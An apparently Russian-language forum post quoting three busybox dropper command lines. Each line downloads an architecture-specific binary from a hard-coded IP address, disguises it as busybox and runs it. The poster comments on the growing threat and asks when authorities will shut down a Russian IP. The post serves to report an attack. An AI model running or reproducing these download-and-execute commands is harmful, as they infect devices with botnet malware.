busybox wget http://89.248.174.55/i686x; cp /bin/busybox ./; cat i686x > busybox; rm i686x; cp busybox i686x; rm busybox; ./i686x
busybox wget http://89.248.174.55/x86_64x; cp /bin/busybox ./; cat x86_64x > busybox; rm x86_64x; cp busybox x86_64x; rm busybox; ./x86_64x
busybox wget http://89.248.174.55/m68kx; cp /bin/busybox ./; cat m68kx > busybox; rm m68kx; cp busybox m68kx; rm busybox; ./m68kx


Рост на лицо, а угроза очевидна!!!
Мне вот интересно, когда это станет интересно компетентным органам и когда они прикроют, как минимум Российский IP 185.11.146.114 ???


Вернуться в «Статьи»